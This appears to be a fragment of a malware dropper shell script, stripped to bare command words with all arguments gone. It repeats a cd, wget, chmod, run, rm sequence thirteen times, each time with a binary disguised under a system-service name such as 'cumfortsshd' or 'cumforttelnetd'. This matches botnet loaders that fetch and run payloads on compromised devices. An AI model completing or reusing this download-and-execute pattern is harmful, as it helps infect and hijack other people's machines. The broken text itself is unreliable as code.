cd
cd
cd
cd
cd
wget
chmod
cumfortntpd
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortsshd
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortbash
rm
cd
cd
cd
cd
cd
wget
chmod
cumforttftp
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortwget
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortcron
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortftp
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortpftp
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortsh
rm
cd
cd
cd
cd
cd
wget
chmod
cumfort
rm
cd
cd
cd
cd
cd
wget
chmod
cumfortapache2
rm
cd
cd
cd
cd
cd
wget
chmod
cumforttelnetd
rm
